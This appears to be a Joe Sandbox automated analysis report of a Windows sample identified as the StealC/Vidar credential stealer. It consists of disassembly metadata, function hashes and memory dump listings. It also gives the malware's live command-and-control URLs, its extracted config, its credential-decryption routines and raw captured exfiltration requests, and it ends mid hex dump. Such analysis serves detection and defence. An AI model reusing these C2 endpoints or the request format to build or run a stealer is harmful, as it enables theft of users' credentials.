Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: d18e3bb6ee8e6635699ae001d0c43cfa3c23643ff0ca2e5caad06c85806d02df
Instruction ID: 0266ed6d40d7f5d0cd59c99ab57d876215968eaa51b73bc5b4091141954084db
Opcode Fuzzy Hash: d18e3bb6ee8e6635699ae001d0c43cfa3c23643ff0ca2e5caad06c85806d02df
Instruction Fuzzy Hash: 5FF03775E44208BBDF10DBB0DC59BAE77B9BB48720F108654FA51A72C0DAB8AA018F41

Function 0093C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0093C74E

Part of subcall function 0093BF9F: __amsg_exit.LIBCMT ref: 0093BFAF

__getptd.LIBCMT ref: 0093C765
__amsg_exit.LIBCMT ref: 0093C773
__updatetlocinfoEx_nolock.LIBCMT ref: 0093C797

Memory Dump Source

Source File: 00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.2260471091.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AC5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AE5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260490573.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DD9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260908127.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261163423.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261279659.0000000000FAF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2261298260.0000000000FB0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: ac736d185d81e201477766f1e25ac46e6df123d46deddebe51f30e277fe607ef
Instruction ID: b73a588170af642e0069e194238ee6129832b48ee7d210255137faa49392be1a
Opcode Fuzzy Hash: ac736d185d81e201477766f1e25ac46e6df123d46deddebe51f30e277fe607ef
Instruction Fuzzy Hash: 97F0BEB2908B009BD721BBB89807B5E33A0AF80724F204149FA0AB62D2CB645D419F56

Function 6C65BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C65BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C65BE8F

Strings

0, xrefs: 6C65BE5B

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 649d6500970ca855c2c481ee1f24676c81dfb6642f3f8c832d97c200676fd99e
Instruction ID: 5aff77c52a83a249f610f6a40117f5f17253505299baa17352f2cf3b02d9aadf
Opcode Fuzzy Hash: 649d6500970ca855c2c481ee1f24676c81dfb6642f3f8c832d97c200676fd99e
Instruction Fuzzy Hash: 6F41B171A09745CFC301CF28C481A9BB7F4AFCA388F544B1DF985A7611D730E9698B8A

Function 6C693CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C693D19
mozalloc_abort.MOZGLUE(?), ref: 6C693D6C

Strings

d, xrefs: 6C693D58

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 79547db147bd6d31f76d90bae60149de37a63823fd5d36e282509eb561b16e80
Instruction ID: ae81405fb39a1e9092750637fc88ed10a7b0fe2e72f912b9bd23e2162f856e3d
Opcode Fuzzy Hash: 79547db147bd6d31f76d90bae60149de37a63823fd5d36e282509eb561b16e80
Instruction Fuzzy Hash: 8111C435E0468997DB008F6ACC644EDB7B5EF86318F458229DD4997622EB30A688C398

Function 6C6B6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C6B6E22
__Init_thread_footer.LIBCMT ref: 6C6B6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C6B6E1D

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: 39a29bee2b8b57065e6a5f8ed2424b066c1647657c83e079799a23cb29785f06
Instruction ID: bcd68a56edc4a956bdd073aa2d8006e056c651a881adc380280f84d7f154e701
Opcode Fuzzy Hash: 39a29bee2b8b57065e6a5f8ed2424b066c1647657c83e079799a23cb29785f06
Instruction Fuzzy Hash: 2DF02E302492C08BDB008B69C8A1A9173B29303318F080165F80196FA2CB31F627CFAF

Function 6C666C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0Kil,?,6C694B30,80000000,?,6C694AB7,?,6C6543CF,?,6C6542D2), ref: 6C666C42

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

moz_xmalloc.MOZGLUE(0Kil,?,6C694B30,80000000,?,6C694AB7,?,6C6543CF,?,6C6542D2), ref: 6C666C58

Strings

0Kil, xrefs: 6C666C33, 6C666C41, 6C666C57

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0Kil
API String ID: 1967447596-1570486273
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: 47a2848e409718a8f1d8a2683fe2594ab049f9b896a105d641ef50186a662689
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: F4E086F1A10D455B9F08D97FAC0956A71C88B553AC7044A35E823C6FC8FAB4E550815F

Function 6C6AB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C6AB2C9,?,?,?,6C6AB127,?,?,?,?,?,?,?,?,?,6C6AAE52), ref: 6C6AB628

Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A90FF
Part of subcall function 6C6A90E0: free.MOZGLUE(?,00000000,?,?,6C6ADEDB), ref: 6C6A9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C6AB2C9,?,?,?,6C6AB127,?,?,?,?,?,?,?,?,?,6C6AAE52), ref: 6C6AB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C6AB2C9,?,?,?,6C6AB127,?,?,?,?,?,?,?,?,?,6C6AAE52), ref: 6C6AB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C6AB127,?,?,?,?,?,?,?,?), ref: 6C6AB74D

Memory Dump Source

Source File: 00000000.00000002.2282469723.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2282453412.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282539890.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2282555646.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 40779d404a368615f40afe1c83035d14527e88d70c3251f7b9a6a7ada22aca6f
Instruction ID: 085effcad87eddf0045659a872f45dad84b52f8dd6c581acd935d8d6010fba1a
Opcode Fuzzy Hash: 40779d404a368615f40afe1c83035d14527e88d70c3251f7b9a6a7ada22aca6f
Instruction Fuzzy Hash: 2251D071A0121A8FDB14CF98C98076EB7B1FF85308F55852DC85AAB710D771EC06CBA9

Source: http://185.215.113.37/e2b1563c6670f193.php9e	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php0u	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phppiT	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dllL	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dllr	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dllP	Avira URL Cloud: Label: malware
Source: http://185.215.113.37	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dllZ	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll(	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpm	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpx	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php3C	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll17-2476756634-1003gv	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phption:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpZ	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll~	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dllLocal	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll$u	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dllp	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php3	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/:	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpMeq	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpieU	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll7	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpAem	Avira URL Cloud: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.phpqe=	Avira URL Cloud: Label: malware

Source: 0.2.file.exe.920000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: 0.2.file.exe.920000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00929B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00929B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0092C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0092C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00929AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00929AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00927240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00927240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00938EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00938EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C666C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.5:49705
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49705 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.5:49705
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49705 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIIDHJEBGIDHJJDBKEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 34 45 44 35 35 33 38 45 34 30 32 32 31 34 33 33 32 31 36 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 2d 2d 0d 0a Data Ascii: ------JDGIIDHJEBGIDHJJDBKEContent-Disposition: form-data; name="hwid"BA4ED5538E402214332168------JDGIIDHJEBGIDHJJDBKEContent-Disposition: form-data; name="build"save------JDGIIDHJEBGIDHJJDBKE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKFHCFBGIIJKFHJDHDHHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 46 48 43 46 42 47 49 49 4a 4b 46 48 4a 44 48 44 48 2d 2d 0d 0a Data Ascii: ------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------DBKFHCFBGIIJKFHJDHDHContent-Disposition: form-data; name="message"browsers------DBKFHCFBGIIJKFHJDHDH--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJECHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="message"plugins------AKJEGCFBGDHJJJJJKJEC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEHHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 41 4b 4b 4b 46 42 46 48 49 44 47 49 49 45 48 2d 2d 0d 0a Data Ascii: ------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="token"091bbaf3d904b499a36566171ad66b696ad69d532085f1df739d58939a3714e18670d1a6------IIJDBAKKKFBFHIDGIIEHContent-Disposition: form-data; name="message"fplugins------IIJDBAKKKFBFHIDGIIEH--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIEHJEBAAFIDHJEBGIHost: 185.215.113.37Content-Length: 6843Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDBKKFHIEGDHJKECAAKHost: 185.215.113.37Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 39 31 62 62 61 66 33 64 39 30 34 62 34 39 39 61 33 36 35 36 36 31 37 31 61 64 36 36 62 36 39 36 61 64 36 39 64 35 33 32 30 38 35 66 31 64 66 37 33 39 64 35 38 39 33 39 61 33 37 31 34 65 31 38 36 37 30 64 31 61 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 